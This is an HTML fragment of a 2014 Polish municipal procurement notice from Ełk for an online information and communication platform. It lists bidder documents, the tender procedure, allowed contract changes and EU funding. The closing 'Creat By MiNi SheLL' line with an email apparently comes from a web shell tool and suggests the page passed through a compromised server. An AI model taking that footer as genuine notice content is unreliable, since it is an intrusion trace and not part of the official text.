<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 3 lat przed upływem terminu składania ofert (a jeśli okres działalności jest krótszy, w tym okresie), co najmniej dwóch usług, przedmiotem których było wykonanie (wraz z instalacją, konfiguracją i szkoleniem) zintegrowanej platformy informacyjnej, posiadającej narzędzia zdalnej interakcji i masowej komunikacji dostępnej online, a wdrożenie platformy obejmowało nie mniej niż 150 użytkowników w każdej usłudze, a wartość każdej usługi wynosiła nie mniej niż 500 000 złotych brutto;

Uwaga: Jeżeli wykazywane usługi będą potwierdzać wysokość tych usług w walucie innej niż PLN, Zamawiający dokona przeliczenia tej wartości na PLN wg średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy  (Zał. nr 1 do SIWZ) - wzór.
2. Dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy w zakresie:
1.	Terminu realizacji umowy, który może ulec zmianie za zgodą stron, w szczególności gdy zaistnieją zdarzenia o charakterze siły wyższej, niezależne od stron umowy, które uniemożliwiłyby terminowe wykonanie umowy. Za siłę wyższą uważa się zdarzenia zewnętrzne, których skutków nie da się przewidzieć ani im zapobiec. W szczególności za siłę wyższą uważa się działania sił przyrody, takie jak: huragan, trzęsienie ziemi, powódź oraz inne zdarzenia takie jak: wojnę, zamieszki, skażenie radioaktywne itp. W takim przypadku strony ustalą nowy termin realizacji umowy, z tym, że maksymalny termin zakończenia będzie przedłużony o nie więcej niż okres przerwy lub postoju spowodowanego wystąpieniem siły wyższej.
2.	Zmiany końcowego terminu realizacji umowy w przypadku zmiany harmonogramu realizacji  projektu będącego załącznikiem umowy o dofinansowanie  zawartej  przez zamawiającego z instytucją współfinansującą.
3.	Zmiany osób uczestniczących w realizacji zamówienia, która może nastąpić w przypadku wniosku Wykonawcy i uzasadnionej obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez Zamawiającego kandydatury innej osoby spełniającej warunki zawarte w Specyfikacji Istotnych Warunków Zamówienia. Przedmiotowe zmiany nie wymagają podpisania aneksu do umowy.
4.	Wynagrodzenia za wykonanie przedmiotu umowy może ulec zmianie w przypadku zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy.
5.	Danych stron umowy, które mogą ulec zmianie w przypadku  przekształceń podmiotowych po stronie Wykonawcy lub Zamawiającego skutkujących następstwem prawnym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/elk_gmina_miejska/zamowienia_publiczne/50/status/0/rodzaj/0/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Ełku,
ul. Piłsudskiego 4,
19 - 300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 09:00, miejsce: Urząd Miasta w Ełku,
ul. Piłsudskiego 4,
19 - 300 Ełk,
Pokój nr 114 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach realizacji projektu Przyjazne e-urzędy na Warmii i Mazurach dofinansowanego z Unii Europejskiej i budżetu państwa w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com